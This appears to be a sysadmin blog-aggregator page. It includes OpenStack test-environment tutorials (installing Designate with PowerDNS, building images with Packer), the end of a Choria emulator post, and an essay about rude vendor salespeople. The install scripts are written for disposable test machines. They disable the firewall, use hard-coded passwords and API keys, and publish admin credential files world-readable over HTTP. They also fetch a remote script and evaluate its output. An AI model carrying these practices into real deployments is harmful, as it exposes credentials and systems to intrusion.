It has an mcollective agent that goes with it; the idea is you create a pool of machines, each with your normal mcollective and this agent on it. Using that agent you then build up a new mcollective network comprising the emulators, federation and NATS.

Here’s some example of commands – you’ll see these later again when we talk about scenarios:

We download the dependencies onto all our nodes:

$ mco playbook run setup-prereqs.yaml --emulator_url=https://example.net/rip/choria-emulator-0.0.1 --gnatsd_url=https://example.net/rip/gnatsd --choria_url=https://example.net/rip/choria

We start NATS on our first node:

$ mco playbook run start-nats.yaml --monitor 8300 --port 4300 -I test1.example.net

We start the emulator with 1500 instances per node all pointing to our above NATS:

$ mco playbook run start-emulator.yaml --agents 10 --collectives 10 --instances 750 --monitor 8080 --servers 192.168.1.1:4300

You’ll then setup a client config for the built network and can interact with it using normal mco stuff and the test suite I’ll show later. Simularly there are playbooks to stop all the various parts etc. The playbooks just interact with the mcollective agent so you could use mco rpc directly too.

I found I can easily run 700 to 1000 instances on basic VMs – needs like 1.5GB RAM – so it’s fairly light. Using 400 nodes I managed to build a 300 000 node Choria network and could easily interact with it etc.

Finally I made an EC2 environment where you can stand up a Puppet Master, Choria, the emulator and everything you need, and do load tests on your own dime. I was able to do many runs with 50 000 emulated nodes on EC2 and the whole lot cost me less than $20.

The code for this emulator is very much a work in progress as is the Go code for the Choria protocol and networking but the emulator is here if you want to take a peek.

by R.I. Pienaar at October 09, 2017 07:37 AM

Joe Topjian

Building OpenStack Environments Part 3

Introduction

Continuing on with the series of building disposable OpenStack environments for testing purposes, this part will cover how to install services which are not supported by PackStack.

While PackStack does an amazing job at easily and quickly creating OpenStack environments, it only has the ability to install a subset of services under the OpenStack umbrella. However, almost all OpenStack services are supported by RDO, the overarching package library for RedHat/CentOS.

For this part in the series, I will show how to install and configure Designate, the OpenStack DNS service, using the RDO packages.

Planning the Installation

PackStack spoils us by hiding all of the steps required to install an OpenStack service. Installing a service requires a good amount of planning, even if the service is only going to be used for testing rather than production.

To begin planning, first read over any documentation you can find about the service in question. For Designate, there is a good amount of documentation here.

The overview page shows that there are a lot of moving pieces to Designate. Whether or not you need to account for all of these is still in question since it's possible that the RDO packages provide some sort of base configuration.

The installation page gives some brief steps about how to install Designate. By reading the page, you can see that not all of the services listed in the Overview require special configuration. This makes things simpler.

Keep in mind that if you were to deploy Designate for production use, you might have to tune all of these services to suit your environment. Determining how to tune these services is out of scope for this blog post. Usually it requires careful reading of the various Designate configuration files, looking for supplementary information on mailing lists, and often even reading the source code itself.

The installation page shows how to use BIND as the default DNS driver. However, I'm going to change things up here. Instead, I will show how to use PowerDNS. There are two reasons for this:

  1. I'm allergic to BIND.
  2. I had trouble piecing together everything required to run Designate with the new PowerDNS driver, so this will also serve as documentation to help others.

Adding the Installation Steps

Continuing with Part 1 and Part 2, you should have a directory called terraform-openstack-test on your workstation. The structure of the directory should look something like this:

$ pwd
/home/jtopjian/terraform-openstack-test
$ tree .
.
├── files
│   └── deploy.sh
├── key
│   ├── id_rsa
│   └── id_rsa.pub
├── main.tf
└── packer
    ├── files
    │   ├── deploy.sh
    │   ├── packstack-answers.txt
    │   └── rc.local
    └── openstack
        ├── build.json
        └── main.tf

deploy.sh is used to install and configure PackStack and then strip any unique information from the installation. Packer then makes an image out of this installation. Finally, rc.local does some post-boot configuration.

To install and configure Designate, you will want to add additional pieces to both deploy.sh and rc.local.

Installing PowerDNS

First, install and configure PowerDNS. To do this, add the following to deploy.sh:

  hostnamectl set-hostname localhost

  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
  packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

+ mysql -e "CREATE DATABASE pdns default character set utf8 default collate utf8_general_ci"
+ mysql -e "GRANT ALL PRIVILEGES ON pdns.* TO 'pdns'@'localhost' IDENTIFIED BY 'password'"
+
+ yum install -y epel-release yum-plugin-priorities
+ curl -o /etc/yum.repos.d/powerdns-auth-40.repo https://repo.powerdns.com/repo-files/centos-auth-40.repo
+ yum install -y pdns pdns-backend-mysql
+
+ echo "daemon=no
+ allow-recursion=127.0.0.1
+ config-dir=/etc/powerdns
+ daemon=yes
+ disable-axfr=no
+ guardian=yes
+ local-address=0.0.0.0
+ local-ipv6=::
+ local-port=53
+ setgid=pdns
+ setuid=pdns
+ slave=yes
+ socket-dir=/var/run
+ version-string=powerdns
+ out-of-zone-additional-processing=no
+ webserver=yes
+ api=yes
+ api-key=someapikey
+ launch=gmysql
+ gmysql-host=127.0.0.1
+ gmysql-user=pdns
+ gmysql-dbname=pdns
+ gmysql-password=password" | tee /etc/pdns/pdns.conf
+
+ mysql pdns < /home/centos/files/pdns.sql
+ sudo systemctl restart pdns

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF

  systemctl stop openstack-cinder-backup.service
  systemctl stop openstack-cinder-scheduler.service
  systemctl stop openstack-cinder-volume.service
  systemctl stop openstack-nova-cert.service
  systemctl stop openstack-nova-compute.service
  systemctl stop openstack-nova-conductor.service
  systemctl stop openstack-nova-consoleauth.service
  systemctl stop openstack-nova-novncproxy.service
  systemctl stop openstack-nova-scheduler.service
  systemctl stop neutron-dhcp-agent.service
  systemctl stop neutron-l3-agent.service
  systemctl stop neutron-lbaasv2-agent.service
  systemctl stop neutron-metadata-agent.service
  systemctl stop neutron-openvswitch-agent.service
  systemctl stop neutron-metering-agent.service

  mysql -e "update services set deleted_at=now(), deleted=id" cinder
  mysql -e "update services set deleted_at=now(), deleted=id" nova
  mysql -e "update compute_nodes set deleted_at=now(), deleted=id" nova
  for i in $(openstack network agent list -c ID -f value); do
    neutron agent-delete $i
  done

  systemctl stop httpd

  cp /home/centos/files/rc.local /etc
  chmod +x /etc/rc.local

There are four things being done above:

  1. A MySQL database is created for PowerDNS.
  2. PowerDNS is then installed.
  3. A configuration file is created.
  4. A database schema is imported into the PowerDNS database.

You'll notice the schema is located in a file titled files/pdns.sql. Add the following to terraform-openstack-test/packer/files/pdns.sql:

CREATE TABLE domains (
  id                    INT AUTO_INCREMENT,
  name                  VARCHAR(255) NOT NULL,
  master                VARCHAR(128) DEFAULT NULL,
  last_check            INT DEFAULT NULL,
  type                  VARCHAR(6) NOT NULL,
  notified_serial       INT DEFAULT NULL,
  account               VARCHAR(40) DEFAULT NULL,
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE UNIQUE INDEX name_index ON domains(name);


CREATE TABLE records (
  id                    BIGINT AUTO_INCREMENT,
  domain_id             INT DEFAULT NULL,
  name                  VARCHAR(255) DEFAULT NULL,
  type                  VARCHAR(10) DEFAULT NULL,
  content               VARCHAR(64000) DEFAULT NULL,
  ttl                   INT DEFAULT NULL,
  prio                  INT DEFAULT NULL,
  change_date           INT DEFAULT NULL,
  disabled              TINYINT(1) DEFAULT 0,
  ordername             VARCHAR(255) BINARY DEFAULT NULL,
  auth                  TINYINT(1) DEFAULT 1,
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE INDEX nametype_index ON records(name,type);
CREATE INDEX domain_id ON records(domain_id);
CREATE INDEX recordorder ON records (domain_id, ordername);


CREATE TABLE supermasters (
  ip                    VARCHAR(64) NOT NULL,
  nameserver            VARCHAR(255) NOT NULL,
  account               VARCHAR(40) NOT NULL,
  PRIMARY KEY (ip, nameserver)
) Engine=InnoDB;


CREATE TABLE comments (
  id                    INT AUTO_INCREMENT,
  domain_id             INT NOT NULL,
  name                  VARCHAR(255) NOT NULL,
  type                  VARCHAR(10) NOT NULL,
  modified_at           INT NOT NULL,
  account               VARCHAR(40) NOT NULL,
  comment               VARCHAR(64000) NOT NULL,
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE INDEX comments_domain_id_idx ON comments (domain_id);
CREATE INDEX comments_name_type_idx ON comments (name, type);
CREATE INDEX comments_order_idx ON comments (domain_id, modified_at);


CREATE TABLE domainmetadata (
  id                    INT AUTO_INCREMENT,
  domain_id             INT NOT NULL,
  kind                  VARCHAR(32),
  content               TEXT,
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE INDEX domainmetadata_idx ON domainmetadata (domain_id, kind);


CREATE TABLE cryptokeys (
  id                    INT AUTO_INCREMENT,
  domain_id             INT NOT NULL,
  flags                 INT NOT NULL,
  active                BOOL,
  content               TEXT,
  PRIMARY KEY(id)
) Engine=InnoDB;

CREATE INDEX domainidindex ON cryptokeys(domain_id);


CREATE TABLE tsigkeys (
  id                    INT AUTO_INCREMENT,
  name                  VARCHAR(255),
  algorithm             VARCHAR(50),
  secret                VARCHAR(255),
  PRIMARY KEY (id)
) Engine=InnoDB;

CREATE UNIQUE INDEX namealgoindex ON tsigkeys(name, algorithm);

Installing Designate

Now that deploy.sh will install and configure PowerDNS, add the steps to install and configure Designate:

  hostnamectl set-hostname localhost

  systemctl disable firewalld
  systemctl stop firewalld
  systemctl disable NetworkManager
  systemctl stop NetworkManager
  systemctl enable network
  systemctl start network

  yum install -y https://repos.fedorapeople.org/repos/openstack/openstack-ocata/rdo-release-ocata-3.noarch.rpm
  yum install -y centos-release-openstack-ocata
  yum-config-manager --enable openstack-ocata
  yum update -y
  yum install -y openstack-packstack
  packstack --answer-file /home/centos/files/packstack-answers.txt

  source /root/keystonerc_admin
  nova flavor-create m1.acctest 99 512 5 1 --ephemeral 10
  nova flavor-create m1.resize 98 512 6 1 --ephemeral 10
  _NETWORK_ID=$(openstack network show private -c id -f value)
  _SUBNET_ID=$(openstack subnet show private_subnet -c id -f value)
  _EXTGW_ID=$(openstack network show public -c id -f value)
  _IMAGE_ID=$(openstack image show cirros -c id -f value)

  echo "" >> /root/keystonerc_admin
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_admin
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_admin
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_admin
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_admin
  echo export OS_POOL_NAME="public" >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_admin
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_admin
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_admin
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_admin
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_admin
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_admin

  echo "" >> /root/keystonerc_demo
  echo export OS_IMAGE_NAME="cirros" >> /root/keystonerc_demo
  echo export OS_IMAGE_ID="$_IMAGE_ID" >> /root/keystonerc_demo
  echo export OS_NETWORK_ID=$_NETWORK_ID >> /root/keystonerc_demo
  echo export OS_EXTGW_ID=$_EXTGW_ID >> /root/keystonerc_demo
  echo export OS_POOL_NAME="public" >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID=99 >> /root/keystonerc_demo
  echo export OS_FLAVOR_ID_RESIZE=98 >> /root/keystonerc_demo
  echo export OS_DOMAIN_NAME=default >> /root/keystonerc_demo
  echo export OS_TENANT_NAME=\$OS_PROJECT_NAME >> /root/keystonerc_demo
  echo export OS_TENANT_ID=\$OS_PROJECT_ID >> /root/keystonerc_demo
  echo export OS_SHARE_NETWORK_ID="foobar" >> /root/keystonerc_demo

  mysql -e "CREATE DATABASE pdns default character set utf8 default collate utf8_general_ci"
  mysql -e "GRANT ALL PRIVILEGES ON pdns.* TO 'pdns'@'localhost' IDENTIFIED BY 'password'"

  yum install -y epel-release yum-plugin-priorities
  curl -o /etc/yum.repos.d/powerdns-auth-40.repo https://repo.powerdns.com/repo-files/centos-auth-40.repo
  yum install -y pdns pdns-backend-mysql

  echo "allow-recursion=127.0.0.1
  config-dir=/etc/powerdns
  daemon=yes
  disable-axfr=no
  guardian=yes
  local-address=0.0.0.0
  local-ipv6=::
  local-port=53
  setgid=pdns
  setuid=pdns
  slave=yes
  socket-dir=/var/run
  version-string=powerdns
  out-of-zone-additional-processing=no
  webserver=yes
  api=yes
  api-key=someapikey
  launch=gmysql
  gmysql-host=127.0.0.1
  gmysql-user=pdns
  gmysql-dbname=pdns
  gmysql-password=password" | tee /etc/pdns/pdns.conf

  mysql pdns < /home/centos/files/pdns.sql
  sudo systemctl restart pdns

+ openstack user create --domain default --password password designate
+ openstack role add --project services --user designate admin
+ openstack service create --name designate --description "DNS" dns
+ openstack endpoint create --region RegionOne dns public http://127.0.0.1:9001/
+
+ mysql -e "CREATE DATABASE designate CHARACTER SET utf8 COLLATE utf8_general_ci"
+ mysql -e "CREATE DATABASE designate_pool_manager"
+ mysql -e "GRANT ALL PRIVILEGES ON designate.* TO 'designate'@'localhost' IDENTIFIED BY 'password'"
+ mysql -e "GRANT ALL PRIVILEGES ON designate_pool_manager.* TO 'designate'@'localhost' IDENTIFIED BY 'password'"
+
+ yum install -y crudini
+
+ yum install -y openstack-designate\*
+
+ cp /home/centos/files/pools.yaml /etc/designate/
+
+ designate_conf="/etc/designate/designate.conf"
+ crudini --set $designate_conf DEFAULT debug True
+ crudini --set $designate_conf DEFAULT notification_driver messaging
+ crudini --set $designate_conf service:api enabled_extensions_v2 "quotas, reports"
+ crudini --set $designate_conf keystone_authtoken auth_uri http://127.0.0.1:5000
+ crudini --set $designate_conf keystone_authtoken auth_url http://127.0.0.1:35357
+ crudini --set $designate_conf keystone_authtoken username designate
+ crudini --set $designate_conf keystone_authtoken password password
+ crudini --set $designate_conf keystone_authtoken project_name services
+ crudini --set $designate_conf keystone_authtoken auth_type password
+ crudini --set $designate_conf service:worker enabled true
+ crudini --set $designate_conf service:worker notify true
+ crudini --set $designate_conf storage:sqlalchemy connection mysql+pymysql://designate:password@127.0.0.1/designate
+
+ sudo -u designate designate-manage database sync
+
+ systemctl enable designate-central designate-api
+ systemctl enable designate-worker designate-producer designate-mdns
+ systemctl restart designate-central designate-api
+ systemctl restart designate-worker designate-producer designate-mdns
+
+ sudo -u designate designate-manage pool update

  yum install -y wget git
  wget -O /usr/local/bin/gimme https://raw.githubusercontent.com/travis-ci/gimme/master/gimme
  chmod +x /usr/local/bin/gimme
  eval "$(/usr/local/bin/gimme 1.8)"
  export GOPATH=$HOME/go
  export PATH=$PATH:$GOROOT/bin:$GOPATH/bin

  go get github.com/gophercloud/gophercloud
  pushd ~/go/src/github.com/gophercloud/gophercloud
  go get -u ./...
  popd

  cat >> /root/.bashrc <<EOF
  if [[ -f /usr/local/bin/gimme ]]; then
    eval "\$(/usr/local/bin/gimme 1.8)"
    export GOPATH=\$HOME/go
    export PATH=\$PATH:\$GOROOT/bin:\$GOPATH/bin
  fi

  gophercloudtest() {
    if [[ -n \$1 ]] && [[ -n \$2 ]]; then
      pushd  ~/go/src/github.com/gophercloud/gophercloud
      go test -v -tags "fixtures acceptance" -run "\$1" github.com/gophercloud/gophercloud/acceptance/openstack/\$2 | tee ~/gophercloud.log
      popd
    fi
  }
  EOF

  systemctl stop openstack-cinder-backup.service
  systemctl stop openstack-cinder-scheduler.service
  systemctl stop openstack-cinder-volume.service
  systemctl stop openstack-nova-cert.service
  systemctl stop openstack-nova-compute.service
  systemctl stop openstack-nova-conductor.service
  systemctl stop openstack-nova-consoleauth.service
  systemctl stop openstack-nova-novncproxy.service
  systemctl stop openstack-nova-scheduler.service
  systemctl stop neutron-dhcp-agent.service
  systemctl stop neutron-l3-agent.service
  systemctl stop neutron-lbaasv2-agent.service
  systemctl stop neutron-metadata-agent.service
  systemctl stop neutron-openvswitch-agent.service
  systemctl stop neutron-metering-agent.service
+ systemctl stop designate-central designate-api
+ systemctl stop designate-worker designate-producer designate-mdns

  mysql -e "update services set deleted_at=now(), deleted=id" cinder
  mysql -e "update services set deleted_at=now(), deleted=id" nova
  mysql -e "update compute_nodes set deleted_at=now(), deleted=id" nova
  for i in $(openstack network agent list -c ID -f value); do
    neutron agent-delete $i
  done

  systemctl stop httpd

  cp /home/centos/files/rc.local /etc
  chmod +x /etc/rc.local

There are several steps happening above:

  1. The openstack command is used to create a new service account called designate. A catalog endpoint is also created.
  2. A database called designate is created.
  3. A utility called crudini is installed. This is an amazing little tool to help modify ini files on the command-line.
  4. Designate is installed.
  5. A bundled pools.yaml file is copied to /etc/designate. I'll show the contents of this file soon.
  6. crudini is used to configure /etc/designate/designate.conf.
  7. The Designate database's schema is imported using the designate-manage command.
  8. The Designate services are enabled in systemd.
  9. designate-manage is again used, this time to update the DNS pools.
  10. The Designate services are added to the list of services to stop before the image/snapshot is created.

These steps roughly follow what was pulled from the Designate Installation Guide linked to earlier.

As mentioned, a pools.yaml file is copied from the files directory. Create a file called terraform-openstack-test/packer/files/pools.yaml with the following contents:

---

- name: default
  description: Default PowerDNS Pool
  attributes: {}
  ns_records:
    - hostname: ns.example.com.
      priority: 1

  nameservers:
    - host: 127.0.0.1
      port: 53

  targets:
    - type: pdns4
      description: PowerDNS4 DNS Server
      masters:
        - host: 127.0.0.1
          port: 5354

      # PowerDNS Configuration options
      options:
        host: 127.0.0.1
        port: 53
        api_endpoint: http://127.0.0.1:8081
        api_token: someapikey

Finally, modify the rc.local file:

  #!/bin/bash
  set -x

  export HOME=/root

  sleep 60

  public_ip=$(curl http://169.254.169.254/latest/meta-data/public-ipv4/)
  if [[ -n $public_ip ]]; then
    while true ; do
      mysql -e "update endpoint set url = replace(url, '127.0.0.1', '$public_ip')" keystone
      if [[ $? == 0 ]]; then
        break
      fi
      sleep 10
    done

    sed -i -e "s/127.0.0.1/$public_ip/g" /root/keystonerc_demo
    sed -i -e "s/127.0.0.1/$public_ip/g" /root/keystonerc_admin
  fi

  systemctl restart rabbitmq-server
  while true; do
    if pgrep -f rabbit; then
      break
    fi
    sleep 10
    systemctl restart rabbitmq-server
  done

  systemctl restart openstack-cinder-api.service
  systemctl restart openstack-cinder-backup.service
  systemctl restart openstack-cinder-scheduler.service
  systemctl restart openstack-cinder-volume.service
  systemctl restart openstack-nova-cert.service
  systemctl restart openstack-nova-compute.service
  systemctl restart openstack-nova-conductor.service
  systemctl restart openstack-nova-consoleauth.service
  systemctl restart openstack-nova-novncproxy.service
  systemctl restart openstack-nova-scheduler.service
  systemctl restart neutron-dhcp-agent.service
  systemctl restart neutron-l3-agent.service
  systemctl restart neutron-lbaasv2-agent.service
  systemctl restart neutron-metadata-agent.service
  systemctl restart neutron-openvswitch-agent.service
  systemctl restart neutron-metering-agent.service
  systemctl restart httpd
+ systemctl restart designate-central designate-api
+ systemctl restart designate-worker designate-producer designate-mdns
+ systemctl restart pdns

  nova-manage cell_v2 discover_hosts

+ sudo -u designate designate-manage pool update
+
+ iptables -I INPUT -p tcp --dport 9001 -j ACCEPT
+ ip6tables -I INPUT -p tcp --dport 9001 -j ACCEPT
+
  iptables -I INPUT -p tcp --dport 80 -j ACCEPT
  ip6tables -I INPUT -p tcp --dport 80 -j ACCEPT
  cp /root/keystonerc* /var/www/html
  chmod 666 /var/www/html/keystonerc*

The following steps have been added:

  1. The Designate services have been added to the list of services to be restarted during boot.
  2. PowerDNS is also restarted.
  3. designate-manage is again used to update the DNS pools.
  4. Port 9001 is opened for traffic.
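The restart-and-check loop used for rabbitmq-server in the rc.local file above is a generally useful pattern. A minimal sketch of it as a reusable function (retry_until is a name of my own choosing, not from the original script):

```shell
# Retry a command until it succeeds or the attempt budget runs out.
# Generalizes the "restart, check, sleep, repeat" loop shown above.
retry_until() {
  local attempts=$1
  shift
  local i
  for ((i = 1; i <= attempts; i++)); do
    if "$@"; then
      return 0
    fi
    sleep 1
  done
  return 1
}

# Example: wait until a file exists (stands in for "pgrep -f rabbit").
touch /tmp/ready
retry_until 3 test -e /tmp/ready && echo "service is up"
```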

Build the Image and Launch

With the above in place, you can regenerate your image using Packer and then launch a virtual machine using Terraform.

When the virtual machine is up and running, you'll find that your testing environment is now running OpenStack Designate.

Conclusion

This blog post covered how to add a service to your OpenStack testing environment that is not supported by PackStack. This was done by reviewing the steps to manually install and configure the service, translating those steps to automated commands, and adding those commands to the existing deployment scripts.

October 09, 2017 06:00 AM

October 08, 2017

Everything Sysadmin

Vendor jerks at tech conferences

(I've intentionally delayed posting this so that it wasn't clear which conference I'm talking about.)

So... I'm at a conference. I take a break from the talks to walk around the vendor show. While most of the booths are selling products I'm not interested in, I suddenly find myself in front of VENDOR-A (name changed to protect them). VENDOR-A makes a product that has both open source and commercial editions, a common business model. Since the company I work for is a happy user of their open source version, I decide to ask about the commercial version. Maybe there's some benefit to be had.

The salesperson turned red in the face and became very indignant.

What?

What did I do wrong?

I'm totally confused.

Not wanting to cause a scene, I politely ended the conversation and walked away. Jerk.

Well, maybe not "jerk". Maybe he just hadn't eaten lunch and was hangry, or maybe he was having a bad day. Or maybe his mom's name is "open source" and he thought I was insulting her. I have no idea.

I was trying to be as polite as possible. It was a "take my money!" situation and the salesperson blew it.

Anyway... I had plenty more to see in the vendor show so I kept walking.

So... then I saw VENDOR-B. VENDOR-B (again, not their actual name) is another vendor whose open source product we're very happy with. Let's try the same thing.

"Yes, yes, thank you. I'm a big fan of your product already. You don't need to convince me. However, we use the open source version now. What benefits would I gain from the commercial version?"

Again, this salesperson turned red in the face and got vitriolic. I, again, stood there totally confused.

So, again, I politely ended the conversation and walked away.

I assure you, reader, that I didn't phrase it as, "This is stupid. Why would I pay?" or anything close to that. Quite the opposite, actually.

The worst answer I was expecting was, "it is the same but you get world-class support". While I may disagree with their self-appraisal of how good their support is, at least it would have been an answer. However, both companies exceeded expectations and took my question as an insult.

I don't think either of these salespeople understands what business they are in.

Let me explain to you the economic model of commercial and open source software.

With commercial software, you sell to someone that isn't using your product. You have to convince them that they have a need, what your product does, that your product fills their need, and that they should buy the product. That's the traditional selling model.

sales-process-commercial.png

Open source software is sold differently. The person already is using the product. They already know how awesome it is. They already know it fulfills their need. The salesperson merely has to convince them that there would be added benefits to paying for it.

sales-process-floss.png

Think about how radical this is! The customer is already happy and you, the salesperson, have the opportunity to make them even happier. There's no need to grandstand (or lie) about what the product can and can't do, because the customer already uses it. This is a much more transparent and cooperative arrangement. It is better for the customer and you.

This also means that your ability to sell the product is as wide as the existing community. The bigger the community, the more selling opportunities. Having good community liaisons, advocates, etc. grows that base. Hosting a conference grows that base. These things aren't just good for your community, but they are good for your salespeople because they increase the pool of potential new paying customers.

A salesperson that meets someone who uses the free/community/open source edition should be super excited at the opportunity to speak with a committed user who can be turned into a paying customer.

The reaction I got from those salespeople says to me that they didn't understand this.

What business did they think they were in?

by Tom Limoncelli at October 08, 2017 09:00 PM

October 07, 2017

Joe Topjian

Building OpenStack Environments Part 2

Introduction

In the last post, I detailed how to create an all-in-one OpenStack environment in an isolated virtual machine for the purpose of testing OpenStack-based applications.

In this post, I'll cover how to create an image from the environment. This will allow you to launch virtual machines which already have the OpenStack environment installed and running. The benefit of this approach is that it reduces the time required to build the environment and pins the environment to a known working version.

In addition, I'll cover how to modify the all-in-one environment so that it can be accessed remotely. This way, testing does not have to be done locally on the virtual machine.

Note: I realize the title of this series might be a misnomer. This series is not covering how to deploy OpenStack in general, but how to set up disposable OpenStack environments for testing purposes. Blame line wrapping.

How to Generate the Image

AWS and OpenStack (and any other cloud provider) provide the ability to create an image (an AMI, a qcow2, etc.) from a running virtual machine. This is commonly known as "snapshotting".

The process described here will use snapshotting, but it's not that simple. OpenStack has a lot of moving pieces and some of those pieces are dependent on unique configurations of the host: the hostname, the IP address(es), etc. These items must be accounted for and configured correctly on the new virtual machine.

With this in mind, the process of generating an image is roughly:

  1. Launch a virtual machine.
  2. Install an all-in-one OpenStack environment.
  3. Remove any unique information from the OpenStack databases.
  4. Snapshot.
  5. Upon creation of a new virtual machine, ensure OpenStack knows about the new unique information.

Creating a Reusable OpenStack Image

Just like in Part 1, it's best to ensure this entire process is automated. Terraform works great to provision and deploy infrastructure, but it is not suited to niche tasks such as snapshotting.

Fortunately, there's Packer. And even more fortunate is that Packer supports a wide array of cloud services.

If you haven't used Packer before, I recommend going through the intro before proceeding here.

In Part 1, I used AWS as the cloud being deployed to. For this part, I'll switch things up and use an OpenStack cloud.

Creating a Simple Image

To begin, you can continue using the same terraform-openstack-test directory that was used in Part 1.

First, create a new directory called packer/openstack:

$ pwd
/home/jtopjian/terraform-openstack-test
$ mkdir -p packer/openstack
$ cd packer/openstack

Next, create a file called build.json with the following contents:


{
  "builders": [{
    "type": "openstack",
    "image_name": "packstack-ocata",
    "reuse_ips": true,
    "ssh_username": "centos",

    "flavor": "{{user `flavor`}}",
    "security_groups": ["{{user `secgroup`}}"],
    "source_image": "{{user `image_id`}}",
    "floating_ip_pool": "{{user `pool`}}",
    "networks": ["{{user `network_id`}}"]
  }]
}

I've broken the above into two sections: the top section has hard-coded values while the bottom section requires input on the command-line. This is because the values will vary between your OpenStack cloud and my OpenStack cloud.
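As an aside, the user-supplied values can also be collected into a JSON variables file and passed with Packer's -var-file flag instead of repeating -var on the command line. A sketch, using the same sample values shown in the command below:

```shell
# Sketch: store the site-specific values in a var file (sample values shown;
# substitute your own flavor, security group, image, pool, and network IDs).
cat > variables.json <<'EOF'
{
  "flavor": "m1.large",
  "secgroup": "AllowAll",
  "image_id": "9abadd38-a33d-44c2-8356-b8b8ae184e04",
  "pool": "public",
  "network_id": "b0b12e8f-a695-480e-9dc2-3dc8ac2d55fd"
}
EOF
# Then build with: packer build -var-file=variables.json build.json
```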

With the above in place, run:

$ packer build \
    -var 'flavor=m1.large' \
    -var 'secgroup=AllowAll' \
    -var 'image_id=9abadd38-a33d-44c2-8356-b8b8ae184e04' \
    -var 'pool=public' \
    -var 'network_id=b0b12e8f-a695-480e-9dc2-3dc8ac2d55fd' \
    build.json

Note the following: the image_id must be a CentOS 7 image and the Security Group must allow traffic from your workstation to Port 22.

This command will take some time to complete. When it has finished, it will print the UUID of a newly generated image:

==> Builds finished. The artifacts of successful builds are:
--> openstack: An image was created: 53ecc829-60c0-4a87-81f4-9fc603ff2a8f

That UUID will point to an image titled "packstack-ocata".

Congratulations! You just created an image.

However, there is virtually nothing different about "packstack-ocata" and the CentOS image used to create it. All Packer did was launch a virtual machine and create a snapshot of it.

In order for Packer to make changes to the virtual machine, you must configure "provisioners" in the build.json file. Provisioners are just like Terraform's concept of provisioners: steps that will execute commands on the running virtual machine. Before you can add some provisioners to the Packer build file, you first need to generate the scripts which will be run.

Generating an Answer File

In Part 1, PackStack was used to install an all-in-one OpenStack environment. The command used was:

$ packstack --allinone

This very simple command will use a lot of sane defaults and the result will be a fully functional all-in-one environment.

